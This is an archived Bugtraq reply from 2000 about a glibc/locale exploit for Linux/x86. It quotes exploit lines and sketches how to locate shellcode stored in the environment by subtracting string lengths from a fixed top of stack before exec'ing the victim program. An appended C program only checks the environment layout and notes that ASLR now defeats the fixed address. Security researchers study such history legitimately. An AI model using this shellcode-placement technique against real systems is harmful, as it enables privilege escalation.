Bugtraq mailing list archives

Re: glibc/locale exploit for linux/x86


From: Olaf Kirch <okir () CALDERA DE>
Date: Thu, 7 Sep 2000 10:43:37 +0200

On Wed, Sep 06, 2000 at 09:01:47PM +0800, Warning3 wrote:
    printf("Using RET location address: 0x%x\n", retloc);
    shell_addr = get_esp() + offset;

I've always wondered why all these exploits mess around with
strange offsets... When the ix86 Linux kernel execs an ELF program,
the stack looks like this (at least it did every time I checked)

0x80000000
0x7FFFFFFC 00 00 00 00
           argv[0] + NUL byte
           last envar
           ...
           first envar
           argv

So it's easy to compute the start of your shell code without
having to rely on magic offsets:

        shell_addr = (caddr_t) 0x7FFFFFFC
                        - strlen(ARGV0) - 1
                        - strlen(EGG) - 1;
        ...
        n = 0;
        myenv[n++] = ...
        myenv[n++] = EGG;
        myenv[n++] = NULL;
        execle(VICTIM_PROGRAM, ARGV0, ..., NULL, myenv);

Just wondering...
Olaf
--
Olaf Kirch         |  --- o --- Nous sommes du soleil we love when we play
okir () monad swb de  |    / | \   sol.dhoop.naytheet.ah kin.ir.samse.qurax
okir () caldera de    +-------------------- Why Not?! -----------------------
         UNIX, n.: Spanish manufacturer of fire extinguishers.


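An added check, not code from Olaf's message or from the original exploit: a small C program that verifies, from inside its own process, the part of the layout described above that still holds on current Linux kernels, namely that the environment strings are packed back to back with only their NUL terminators between them, so the strlen()+1 arithmetic in the post measures the span correctly. The absolute top-of-stack constant it relies on, however, is randomised per run by ASLR on current kernels, and the program prints the actual addresses so that this is visible.

```c
#include <stdio.h>
#include <string.h>

/* The process's own environment vector, laid out by the kernel at exec. */
extern char **environ;

/* Number of entries in a NULL-terminated string vector (argv or envp). */
size_t vec_count(char **vec)
{
    size_t n = 0;
    while (vec[n] != NULL)
        n++;
    return n;
}

/* Return 1 if every string in vec starts exactly one byte past the end of the
 * previous one (no gaps between them), 0 otherwise. Empty vector counts as 1. */
int strings_contiguous(char **vec)
{
    size_t n = vec_count(vec);
    for (size_t i = 0; i + 1 < n; i++)
        if (vec[i + 1] != vec[i] + strlen(vec[i]) + 1)
            return 0;
    return 1;
}

/* Total bytes occupied by the strings in vec, NUL terminators included:
 * the distance the post's strlen()+1 arithmetic walks down from the top. */
size_t strings_span(char **vec)
{
    size_t total = 0;
    for (size_t i = 0; vec[i] != NULL; i++)
        total += strlen(vec[i]) + 1;
    return total;
}

int main(int argc, char **argv)
{
    size_t n = vec_count(environ);
    printf("%d args, argv[0] string at %p\n", argc, (void *)argv[0]);
    printf("%zu env strings, %zu bytes, contiguous: %s\n", n,
           strings_span(environ), strings_contiguous(environ) ? "yes" : "no");
    /* With ASLR (the default on current kernels) these addresses move from
     * run to run, so a fixed top-of-stack constant no longer locates them. */
    if (n > 0)
        printf("env strings occupy %p .. %p\n", (void *)environ[0],
               (void *)(environ[n - 1] + strlen(environ[n - 1]) + 1));
    return 0;
}
```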